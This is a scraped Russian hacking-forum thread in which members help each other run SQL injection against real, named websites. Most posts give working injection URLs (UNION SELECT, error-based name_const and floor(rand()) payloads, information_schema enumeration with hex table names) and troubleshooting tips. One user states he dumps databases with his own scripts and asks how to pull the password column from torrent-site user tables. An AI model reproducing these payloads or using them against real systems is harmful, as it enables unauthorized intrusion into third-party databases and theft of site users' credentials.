Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://venec.ulstu.ru/lib/go.php?id=21511111111111+UNION+SELECT+1,2,3,4,5,6,7,8,9,unhex%28hex%28version%28%29%29%29,11,12,13,14,15,16,17,18,19,20,21,22--


    не?
     
    _________________________
    3 people like this.
  2. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    ну ты и мозг)))
    а тут

    http://www.fanfics.ru/read.php?id=3&chapter=-616'

    ошибка есть, что не подставлю она пропадает, как быть?
     
  3. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605

    какой там вывод? или я в шары долблюсь?
     
    _________________________
    2 people like this.
  4. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    норм. вывод '5.1.45'
     
    1 person likes this.
  5. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    чёт непойму где ты там вывод нашол? у меня как небыло так и нету
     
  6. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Пробелы постирайте))

     
    2 people like this.
  7. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    [​IMG]
     
    1 person likes this.
  8. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Потому что скуля там не в GET-параметре, а в URI:

    http://www.fanfics.ru/read.php?id=3&'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1

    Посмотри внимательно на запрос, а вывод все-ровно есть, магия!!11

    А ты, судя по всему, юзаешь FF, который урлэнкодит запросы. Используй другой браузер, или ставь патч для FF (https://rdot.org/forum/showthread.php?t=1403)
     
    3 people like this.
  9. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    точняк, в опере норм открывает, единственная трабла, я сливаю базы через свои php скрипты, и они также как и фф нехотят выодить как нужно, мб есть какое решение?

    и сразу ещо вопрос, таблицы выводит нормально, колонки нехочет

    http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3,4,5,6,7,8,9,10,11,column_name,13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+limit+0,1--+

    как их вывести?
     
  10. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3,4,5,6,7,8,9,10,11,column_name,13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+limit+0,1--+

    Читая твои вопросы, в 70% у тебя проблема в себе самом и в том, что ты не пытаешься сам решить проблему. Если хочешь чему-то научиться, сначала пробуй разобраться.
     
    #19930 Melfis, 24 Mar 2012
    Last edited: 24 Mar 2012
    1 person likes this.
  11. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Все выводиться, WHERE убери =\
     
  12. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    После 'where' надо добавить table_name=0x[хекс значение выводимой таблы]+limit+0,1+--+
     
    _________________________
  13. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    40
    Likes Received:
    0
    Reputations:
    0
    А на мой вопрос кто нибудь ответит?
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    для кого это тема?

    там море ссылок
     
    _________________________
  15. beBoss

    beBoss New Member

    Joined:
    29 Sep 2010
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    http://site.com/about.php?page='

    Is that sql vuln ?

    Well, for now I don't want to post link over the internet, but can you help me a little to find the tables ? I tried so many of ways but can't get working method...

    My tries:
    Code:
    http://site.com/about.php?page=')+order+by+13--+-
    http://site.com/about.php?page='+order+by+13--+-
    http://site.com/about.php?page=' order by 13
    But there is no change...
    Any ideas ?

    BTW I'm sorry about the language, but if I use google translate, would be awful for all of us...
     
    1 person likes this.
  16. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Yes, this is sql-injection, but in LIMIT. You can't exploit this vuln.
     
  17. beBoss

    beBoss New Member

    Joined:
    29 Sep 2010
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Sad face :(
    Thanks for the info :)
     
  18. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    та то я нечаёно оставил, забыл вытереть прежде чем запостить

    да и так пробовал, вабще колонки выводить нехочет
     
  19. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Не понимаю почему у вас не получается, вот вам вывод, взял из случайной таблици: INNODB_CMP_RESET где ее хекс значение равняется 494e4e4f44425f434d505f5245534554

    _http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(column_name),13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+table_name=0x494e4e4f44425f434d505f5245534554+limit+0,1--+
     
    _________________________
  20. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    такс, тут ещо проблема

    http://torrnado.ru/peerlist.php?id=982+and%28select+1+from%28select+count%28*%29,concat%28%28select+column_name+from+information_schema.columns+where+table_name=0x70687062625f7573657273+limit+19000,1%29,0x00,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29--+

    таблици вывело нормально

    отсюда torrent:xbt_users:1567810 нехочет выводить кольнку pass(не могу поверить что она пустая)

    и
    нхочет вобще выводить колонки и инфу из torrent:phpbb_users:1551912
    ну пустой она быть нможет так как там всётак есть форум с юзерами)) как мн ето всё вывести?
     
Thread Status:
Not open for further replies.